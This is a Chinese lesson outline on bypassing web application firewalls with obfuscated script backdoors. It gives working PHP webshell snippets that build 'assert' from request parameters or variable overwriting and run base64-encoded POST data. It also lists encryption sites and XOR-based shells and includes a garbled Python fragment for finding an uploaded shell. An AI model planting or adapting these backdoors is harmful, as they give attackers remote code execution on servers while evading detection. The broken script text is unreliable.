第77天 WAF攻防-权限控制&代码免杀&异或运算&变量覆盖&混淆加密&传参
知识点:
1、脚本后门基础&原理
2、脚本后门查杀绕过机制
3、权限维持覆盖&传参&加密&异或等
代码块&传参数据&工具指纹等(表面&行为)
1、代码表面层免杀-ASP&PHP&JSP&ASPX等
2、工具行为层免杀菜刀&蚁剑&冰蝎&哥斯拉等
章节点:
WAF绕过主要集中在信息收集,漏洞发现,漏洞利用,权限控制四个阶段
补充点:
1、什么是WAF?
Veb Application Firewall(web应用防火墙),一种公认的说法是"web应用防火墙通过执
行一系列针对HTTP/HTTPS的安全策路来专门为wb应用提供保护的一款产品。
基本可以分为以下4种
软件型WAF
以软件的形式安装在服务器上面,可以接触到服务器上的文件,因此就可以检测服务器上
是否有webshell,是否有文件被创建等。
硬件型WAF
以硬件形式部署在链路中,支持多种部暑方式。当串联到链路上时可以拦截恶意流重,在
旁路监听模式时只记录攻击但是不进行拦截。
云WAF
一股以反向代理的形式工作,通过配置后,使对网站的请求数据优先经过WAF主机,在
WAF主机对数据进行过滤后再传给服务器
网站内置的WAF
就是来自网站内部的过滤,直接出现在网站代码中,比如说对输入的参数强制类转换啊,
对输入的参数进行敏感词检测测啊什么的
演示案例:
基础-脚本后门控制原理代码解释
原理-脚本后门查杀机制-函数&行为
代码-脚本后门免杀变异-覆盖&传参
代码-脚本后门免杀变异-异或&加密
拓展脚本后门脚本类型-JSP&ASPX
基础脚本后门控制原理代码解释
对比工具代码菜刀&蚁剑&冰蝎&哥斯拉等
原理脚本后门查杀机制函数&行为
对比WAF规则数匹配&工具指纹等
代码脚本后门免杀变异夏盖&传参
1.php传参带入
<?php
$a=$_GET['a'];
$aa=$a.'ert';
$aa(base64_decode($_POST['X'])):
?>
?a=ass
x=cGhwaW5mbygpOw==
2.php变量覆盖
<?php
$a='b';
$b='assert';
$$a(base64_decode($_POST['x']));
?>
x=cGhwaw5mbygpow==
#代码脚本后门兔杀变异异或&加密
3.php加密变异
http://www.phpjm.net
https://www.phpjms.com/
http://1.15.155.76.1234/
思路:将webshell加密,上传过程中则不会被检测出,然后传参时使用参数加密绕过参数检测
4.php异或运算 无字符webshell
import requests
import time
import threading.queue
def string(
while not q.empty()
filename=q.get()
url ='http://127.0.0.1:8081/x/+filename
datas =
'x':'phpinfo();'
result requests.post(url,data=datas).content decode('utf-8')
if 'XIAODI-PC'in result
拓展即本后门脚本类型JSP&ASPX
5.php脚本生成器
Webshell-venom
ASP PHP JSP ASPX